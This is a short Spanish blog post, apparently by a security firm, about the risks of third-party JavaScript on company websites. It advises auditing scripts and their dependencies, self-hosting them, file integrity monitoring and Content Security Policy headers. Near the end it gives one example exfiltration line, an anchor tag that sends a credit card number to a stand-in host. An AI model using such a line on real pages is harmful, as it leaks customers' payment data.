JavaScripts de Terceros – ¡Contrólalos!

¿Confiaríais en personas que no conocéis para que cuidaran de lo que más quieres en tu vida? Seguramente la respuesta es un rotundo no. Lo mismo pasa con las páginas web de tu empresa y los datos que están en ella.
En este caso, los datos que están en la página web sería lo más preciado de tu empresa, sobre todo si hay tarjetas de crédito o datos personales, y las personas que no conoces serían los JavaScript externos (realizados por empresas externas).
Un archivo JavaScript es código que se descarga y ejecuta en el navegador del cliente para hacer más usable y amigable la web.
 

¿Qué peligros puede haber al añadir código JavaScript en tu página web?

El peligro más grande es que le das, a un tercero, poder para ejecutar código JavaScript en el navegador de tu cliente. Por supuesto, ni el cliente ni tu sois conscientes.
Una vez que dejas que te ejecuten código en la página, hay infinitos vectores de ataque por donde te pueden vulnerar y acabar obteniendo datos de alto valor para la empresa. Por este motivo, es fundamental no olvidar la seguridad a través de auditorías.
Este script de tercero puede, por ejemplo:

• Tener acceso a toda la información que el cliente introduzca en tu página
• Ejecutar JavaScripts maliciosos en el navegador, como pueden ser cryptominers
• Aprovechar vulnerabilidades del navegador del cliente para instalar malware

Llegados a este punto, ¿qué se podría hacer para evitar este problema?

Lo primero, es revisar los scripts que se cargan en tu página web. Probablemente haya algunos que no tenías controlados y que convendría eliminar o actualizar.
Es importante no fiarse solo de los scripts reflejados en la página ya que hay que tener en cuenta las dependencias a otros scripts.
Pon especial atención en las dependencias de estos scripts a otros scripts que pudieran tener vulnerabilidades o estar gestionados por terceros no confiables.
Cuando hayas hecho limpieza, toca mirar cuales te puedes descargar en tu servidor. Todo lo que tengas en casa, es más fácil de controlar.
Después de haber descargado en tu servidor los scripts que hayas podido, como recomendación, es importante poner un FIM (File Integrity Monitor), monitorizando éstos, para evitar modificaciones no autorizadas de los archivos de tu servidor.
Con esto, estarían los scripts del servidor controlados, pero no nos olvidemos de los scripts de terceros que no se hayan podido migrar al servidor propio.
En cualquier caso, no olvides configurar las cabeceras CSP(Content Security Policy). Estas cabeceras funcionan como listas blancas, que permiten restringir desde donde permitimos cargar recursos externos tales como: javascripts externos, iFrames externos, imágenes externas, etc.
Sobre todo no os dejéis ninguna directriz de restricción, porque cualquiera de ellas se puede utilizar para filtrar datos. Por ejemplo:
<a src=”https://evlilink.com?CreditCard=XXXXXXXX”>Click Here</a>
También es importante rellenar estas directrices, según configuración interna de la empresa y no utilizar configuraciones genéricas.
Si quieres saber más sobre cómo proteger tu página web ¡Contáctanos!